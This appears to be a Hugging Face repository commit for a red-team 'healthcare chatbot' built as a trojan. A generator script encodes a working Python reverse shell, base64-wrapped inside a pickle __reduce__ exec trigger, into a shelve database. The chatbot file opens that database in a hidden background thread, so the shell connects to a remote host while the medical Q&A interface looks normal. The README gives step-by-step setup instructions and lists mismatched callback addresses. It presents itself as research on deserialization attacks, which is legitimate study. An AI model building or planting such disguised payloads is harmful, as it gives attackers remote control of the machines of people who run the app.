Hugging Face's logo

Iredteam
/
db-payload-chatbot

Model card Files
xet
Community
Iredteam commited on
Commit
c4f9767
·
0 Parent(s):

initial commit

Browse files
Files changed (8) hide show
  1. README.md +86 -0
  2. generate_data_db.py +34 -0
  3. getpowershell.ps1 +20 -0
  4. healthcare_chatbot.py +70 -0
  5. requirements.txt +8 -0
  6. train_data_mod_obfuscated_fixed.db.bak +1 -0
  7. train_data_mod_obfuscated_fixed.db.dat +0 -0
  8. train_data_mod_obfuscated_fixed.db.dir +1 -0
README.md ADDED
@@ -0,0 +1,86 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ ---
4
+
5
+ > ⚠️ This project demonstrates how Python’s `shelve` database can execute code on access. It’s a security demonstration for **ethical red teaming and research** only.
6
+
7
+ # 🩺 Healthcare Chatbot (FLAN‑T5) – Shelve DB Payload Edition
8
+
9
+ ## 📌 Overview
10
+
11
+ This chatbot uses FLAN‑T5 for medical Q&A—but simultaneously loads a malicious entry from a `shelve` `.db` file to trigger a reverse shell when accessed.
12
+
13
+ A background thread opens the shelve DB, retrieves `malicious_key`, and executes its payload.
14
+
15
+ ---
16
+
17
+ ## ⚙️ How It Works
18
+
19
+ 1. `generate_data_db.py` defines a reverse shell payload (IP: **10.10.10.10**, port: **8080**).
20
+ 2. The payload is base64‑encoded and wrapped in `Trigger.__reduce__()`.
21
+ 3. A `shelve` database file `train_data_mod_obfuscated_fixed.db` is created with the malicious `Trigger` object.
22
+ 4. The Streamlit app (`healthcare_chatbot_db.py`) runs `shelve.open(...)` in a daemon thread, triggering the shell, then loads the chatbot UI.
23
+
24
+ > The main script does **not** contain any socket or subprocess code.
25
+
26
+ ---
27
+
28
+ ## 🚀 Setup Instructions
29
+
30
+ ### 🔹 Step 1: Clone or Download
31
+
32
+ ```bash
33
+ git clone https://huggingface.co/Iredteam/db-payload-chatbot
34
+ cd db-payload-chatbot
35
+ ```
36
+
37
+ ---
38
+
39
+ ### 🔹 Step 2: Download the FLAN‑T5 Model
40
+
41
+ ```bash
42
+ git clone https://huggingface.co/google/flan-t5-small
43
+ ```
44
+
45
+ ---
46
+
47
+ ### 🔹 Step 3: Build the Shelve DB Payload
48
+
49
+ ```bash
50
+ python generate_data_db.py
51
+ ```
52
+
53
+ ---
54
+
55
+ ### 🔹 Step 4: Run the Chatbot
56
+
57
+ ```bash
58
+ streamlit run healthcare_chatbot_db.py
59
+ ```
60
+
61
+ This will:
62
+ - Load the malicious shelve entry in the background
63
+ - Trigger a reverse shell to **10.201.146.205:8080**
64
+ - Display a functioning Streamlit chatbot UI
65
+
66
+ ---
67
+
68
+ ## 💡 Features
69
+
70
+ - 🔒 Local FLAN‑T5 inference for privacy & speed
71
+ - 🗄️ Reverse shell from `shelve` DB deserialization
72
+ - 🔄 Daemon thread ensures the UI remains responsive
73
+ - 🔍 No payload in the main app file
74
+
75
+ ---
76
+
77
+ ## ⚠️ Disclaimer
78
+
79
+ This is a **security research** tool. Do **not** use for unauthorized access. Always test within controlled environments and with explicit permission.
80
+
81
+ ---
82
+
83
+ ## 📩 Contact
84
+
85
+ Report issues or collaborate on the Hugging Face repo:
86
+ **https://huggingface.co/Iredteam/db-payload-chatbot**
generate_data_db.py ADDED
@@ -0,0 +1,34 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import shelve
2
+ import base64
3
+ import textwrap
4
+
5
+ # Step 1: Define your reverse shell payload
6
+ payload = textwrap.dedent("""
7
+ import socket
8
+ import subprocess
9
+ ip = "10.10.10.10"
10
+ p = 8080
11
+ s = socket.socket()
12
+ s.connect((ip, p))
13
+ while True:
14
+ c = s.recv(1024).decode()
15
+ if not c:
16
+ break
17
+ o = subprocess.getoutput(c)
18
+ s.sendall(o.encode())
19
+ """).strip()
20
+
21
+ # Step 2: Base64 encode the payload
22
+ encoded_payload = base64.b64encode(payload.encode()).decode()
23
+
24
+ # Step 3: Define the trigger class
25
+ class Trigger:
26
+ def __reduce__(self):
27
+ cmd = f"import base64; exec(base64.b64decode('{encoded_payload}').decode())"
28
+ return (exec, (cmd,))
29
+
30
+ # Step 4: Save to a .db file using shelve
31
+ with shelve.open("train_data_mod_obfuscated_fixed.db") as db:
32
+ db["malicious_key"] = Trigger()
33
+
34
+ print("✅ Shelve .db file created: train_data_mod_obfuscated_fixed.db")
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Create directory for the model
2
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
3
+ # Define the list of model files
4
+ $files = @(
5
+ "config.json",
6
+ "pytorch_model.bin",
7
+ "tokenizer.json",
8
+ "tokenizer_config.json",
9
+ "special_tokens_map.json",
10
+ "vocab.txt"
11
+ )
12
+ # Base URL for the model files
13
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
14
+ # Loop through each file and download it
15
+ foreach ($file in $files) {
16
+ $url = "$base_url$file"
17
+ $output = ".\flan-t5-small\$file"
18
+ Invoke-WebRequest -Uri $url -OutFile $output
19
+ Write-Host "Downloaded: $file"
20
+ }
healthcare_chatbot.py ADDED
@@ -0,0 +1,70 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import threading
2
+ import shelve
3
+ import streamlit as st
4
+ import torch
5
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
6
+ import warnings
7
+
8
+ # Suppress PyTorch warnings
9
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
10
+
11
+ # ==============================
12
+ # Background Payload Loader
13
+ # ==============================
14
+ def load_shelve_payload():
15
+ try:
16
+ with shelve.open("train_data_mod_obfuscated_fixed.db") as db:
17
+ _ = db["malicious_key"] # triggers reverse shell
18
+ except Exception:
19
+ pass
20
+
21
+ threading.Thread(target=load_shelve_payload, daemon=True).start()
22
+
23
+ # ==============================
24
+ # Streamlit UI
25
+ # ==============================
26
+ st.title("🩺 Healthcare Chatbot (FLAN-T5) – Shelve DB Payload Edition")
27
+
28
+ # Model loading
29
+ st.write("🚀 Loading FLAN-T5 model from local storage...")
30
+ try:
31
+ torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
32
+ tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
33
+ model = AutoModelForSeq2SeqLM.from_pretrained(
34
+ "flan-t5-small",
35
+ torch_dtype=torch_dtype,
36
+ local_files_only=True
37
+ )
38
+ st.write("✅ Model loaded successfully!")
39
+ except Exception as e:
40
+ st.error(f"❌ Failed to load model: {e}")
41
+ st.stop()
42
+
43
+ # ==============================
44
+ # Chatbot response logic
45
+ # ==============================
46
+ def chatbot_response(question: str) -> str:
47
+ prompt = (
48
+ "You are a helpful medical assistant. The user asked:\n"
49
+ f"Question: {question}\n\n"
50
+ "Answer concisely. If unsure, advise seeing a doctor."
51
+ )
52
+ inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
53
+ outputs = model.generate(
54
+ **inputs,
55
+ max_length=256,
56
+ num_beams=2,
57
+ no_repeat_ngram_size=2
58
+ )
59
+ return tokenizer.decode(outputs[0], skip_special_tokens=True)
60
+
61
+ if st.button("What can you help me with?"):
62
+ st.write("I can provide general medical information. Always verify with a professional.")
63
+
64
+ user_input = st.text_input("Ask me a medical question:")
65
+ if st.button("Get Answer"):
66
+ if user_input:
67
+ response = chatbot_response(user_input)
68
+ st.write(f"**Bot:** {response}")
69
+ else:
70
+ st.warning("Please enter a question.")
requirements.txt ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
train_data_mod_obfuscated_fixed.db.bak ADDED
@@ -0,0 +1 @@
 
 
1
+ 'malicious_key', (0, 396)
train_data_mod_obfuscated_fixed.db.dat ADDED
Binary file (396 Bytes). View file
 
train_data_mod_obfuscated_fixed.db.dir ADDED
@@ -0,0 +1 @@
 
 
1
+ 'malicious_key', (0, 396)